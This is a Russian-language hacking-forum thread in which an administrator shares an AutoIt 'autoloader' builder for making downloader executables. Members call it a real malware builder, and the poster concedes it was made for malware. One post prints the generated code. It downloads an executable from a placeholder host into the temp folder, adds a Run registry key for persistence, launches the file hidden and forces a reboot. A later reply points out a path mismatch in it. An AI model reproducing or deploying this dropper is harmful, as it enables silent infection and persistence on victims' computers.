Автолоадер + исходник

Тема в разделе "Упаковщики и хакерские утилиты", создана пользователем X-Shar, 15 мар 2014.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Скрипт для загрузки файла с сервера на комп:

    1020664_m.

    Думаю все понятно.

    Меню "действие после загрузки:" именно самого файла введенного в верхнем поле.

    Автолоадер компилируеться в load.exe

    Исходник в архиве (Autoit).

    Пароль:111
     

    Вложения:

    • Autoloader.zip
      Размер файла
      970,5 КБ
      Просмотров:
      45
    • Мне нравится Мне нравится x 6
  2. S@ltyk Житель форума
    S@ltyk
    Ответить в чате

    Форумчанин

    Регистрация:
    29.04.2015
    Сообщения:
    12
    Симпатии:
    1
    Пол:
    Мужской
    Репа:
    +1 / 0 / -0
    Программа запустилась на Win7_x64, на Win7_x86 не стала запускаться.
    upload_2015-5-5_17-38-31.

    После создания файла загрузки "file.exe" на Win7_x64 файл не запустился с ошибкой:
    upload_2015-5-5_17-37-13.

    После запуска файла"file.exe" на Win7_x86 след ошибка:
    upload_2015-5-5_17-35-23.
     
  3. Nedovirus Уважаемый пользователь
    Nedovirus
    Ответить в чате

    Форумчанин

    Регистрация:
    14.05.2014
    Сообщения:
    478
    Симпатии:
    821
    Пол:
    Мужской
    Репа:
    +845 / 14 / -5
    Вместо скринов можно было просто написать, что нет совместимости между разноразрядными системами.
     
  4. Nedovirus Уважаемый пользователь
    Nedovirus
    Ответить в чате

    Форумчанин

    Регистрация:
    14.05.2014
    Сообщения:
    478
    Симпатии:
    821
    Пол:
    Мужской
    Репа:
    +845 / 14 / -5
    А по данной теме много очень вопросов.

    - Где обещанные исходники?
    - Хрен с ним с исходниками, декомпильнул. "FileClose("load.au3")" - декомпилер все правильно выдрал? Если, да, то что выполняет данный код по задумке автора? sholoh it
    - почему версия билдера х64, которая будет работать только в х64, если х86 в данном случае будет идеально работать везде?
    - зачем в паблик кидать реальный билдер даунлоадера (а это правда билдер - создает сорец и его компилирует)? Ты же выходит реально создал малварь вместе с инструментом для ее создания.
    - Local $Ping="" - неразглядел - таким кодом ты пингуешь яндекс или гугл? Не въехал!!!
    - AutoItSC.bin - what is this? Составная часть продукта на основе которой компилится?


    но зачетно i'm beach
     
    • Мне нравится Мне нравится x 1
  5. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Автор не я, если-что...

    По последнему вопросу, доунлодер - Это для меня не малварь, ведь даунлодер может грузить и полезные программы...

    В пример Adobe и прочее, те-же доунлодеры... Хотя в данном случае, именно для малвари сделано было !смех-смех!!!

    А так с остальным согласен, про исходник-да, непонимаю куда он делся...Отдыхай!!!
     
  6. Nedovirus Уважаемый пользователь
    Nedovirus
    Ответить в чате

    Форумчанин

    Регистрация:
    14.05.2014
    Сообщения:
    478
    Симпатии:
    821
    Пол:
    Мужской
    Репа:
    +845 / 14 / -5
    А я думал ты, поэтому так мягко выразился про кривой до ужаса код ха-ха-ха
     
  7. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Сейчас глянул, да он делает исходник AutoIT, потом по задумке видно должен компилить его, вот код получился пример:
    Код:
    InetGet("http://site.com/file.exe", @TempDir "\file.exe")
    RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run""file.exe""REG_SZ""C:\Windows\Temp\file.exe")
    RunWait(@TempDir "\file.exe",'', @SW_HIDE)
    Sleep(15000)
    Shutdown(2)
    Это я выставил галочки: Добавлять в автозапуск + перезагрузка...

    Вот и весь даунлодер...Dmeh-Smeh-Smeh!!!
     
  8. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Что делает bin, незнаю...Не въехал!!!Не въехал!!!Не въехал!!!
     
  9. Nedovirus Уважаемый пользователь
    Nedovirus
    Ответить в чате

    Форумчанин

    Регистрация:
    14.05.2014
    Сообщения:
    478
    Симпатии:
    821
    Пол:
    Мужской
    Репа:
    +845 / 14 / -5
    Ну выше я код копировал тебе самого билдера, а не того, что он "билдит". То, что он билдит еще более худшее дерьмо (если смотреть на тот код, что ты привел), т.к @TempDir возвращает путь к юзерскому темпу, а в автозагрузку пишется путь к темпу в папке винды Dmeh-Smeh-Smeh!!!
     
    • Мне нравится Мне нравится x 1

Поделиться этой страницей